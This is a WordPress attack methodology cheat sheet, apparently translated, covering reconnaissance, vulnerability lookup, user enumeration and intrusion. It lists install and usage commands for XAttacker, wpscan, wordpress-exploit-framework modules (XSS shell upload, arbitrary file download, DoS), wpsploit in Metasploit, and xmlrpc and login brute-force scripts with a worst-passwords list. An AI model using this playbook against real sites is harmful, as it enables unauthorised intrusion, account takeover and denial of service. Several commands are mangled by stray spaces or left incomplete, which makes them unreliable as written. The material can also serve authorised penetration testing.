WordPress Methodology:
1) Walk-through tools:
https://github.com/Moham3dRiahi/XAttacker
https://github.com/wpscanteam/wpscan
https://github.com/rastating/wordpress-exploit-framework
https://github.com/espreto/wpsploit
2) See vulnerabilities for this version on the site https://wpvulndb.com/
3) Scan directories (wfuzz with dictionaries for WordPress)
4) Collect users, if unique names, then check for password leak by login (to build wpscan \ wpucollect)
5) Brush the admin panel with the following tools collected by users
https://github.com/zendoctor/wpbrute-rpc (brute if there is xmlrpc.php)
https://github.com/RecepGunes01/WordPress- Brute-Force
XAttacker:
echo “http://example.com” >> list.txt
perl XAttacke r.pl -l list.txtwpscan:
git clone https://github.com/wpscanteam/wpscan
cd wpscan / bundle install && rake install
wpscan --hh shows all full help
The script also supports the enumeratefunction
wpscan --url https: //example.com/ -e
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. eg: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m Media IDs range. eg m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
wordpress-exploit-framework:
Contains 288 exploits, 58 checks
Dependencies
apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev -yInstallation:
gem install wpxf Running
wpxf
Using exploits\
use auxiliary/dos/load_scripts_dos
use wp_v4.7.2_csrf_dos
use exploit/xss/reflected/contact_form_plugin_reflected_xss_shell_upload
use auxiliary/file_download/ad_widget_php_file_download
use exploit/xss/reflected/count_per_day_reflected_xss_shell_upload
use auxiliary/file_download/cp_image_store_arbitrary_file_download
use exploit/xss/reflected/custom_fields_search_reflected_xss_shell_upload
use auxiliary/file_download/history_collection_arbitrary_file_download
use exploit/xss/reflected/custom_search_plugin_reflected_xss_shell_upload
use
load
use auxiliary/file_download/simple_download_monitor_file_download
use exploit/xss/reflected/email_queue_reflected_xss_shell_upload
use
use exploit/xss/reflected/colorway_reflected_xss_shell_upload
use exploit/xss/stored/wp_v4.3_shortcode_xss_shell_uploadTo view the settings, enter show options
To set the option, enter the set command, example:
Use the check:
use auxiliary/dos/long_password_dos
show options
set target example.com
set username admin
runwpsploit:
cd /tmp
git clone https://github.com/espreto/wpsploit
mv wpsploit/modules/auxiliary/ ~/.msf4/modules/
mv wpsploit/modules/exploits/ ~/.msf4/modules/
msfconsoleuse wp (double click the tab button will show exploits and verifications related to wordpress)
To show the settings, enter show options
To install the options, enter the set command, example:
Use the test:
use exploits/unix/webapp/wp_acf_frontend_display_file_upload.rb
show options
set target example.com
runwpbrute-rpc:
git clone https://github.com/zendoctor/wpbrute-rpc
cd wpbrute-rpc/
bundle install
ruby ./wpbrute-rpc.rb --url = "https://wp.example.com/xmlrpc.php" --user = admin --count = 500 --list =. / 500-worst-passwords.txtWordPress-Brute-Force:
git clone https://github.com/RecepGunes01/WordPress-Brute-Force
cd WordPress-Brute-Force/Create site.txt files , user.txt, password.txt and fill out their contents
python brute-force.py site.txt user.txt password.txtCybScan:
clone https://github.com/Cyb3r3x3r/cybscan
cd cybscan/
pip install -r requirements. txt # installdependencies
pythoncybscan.py example.com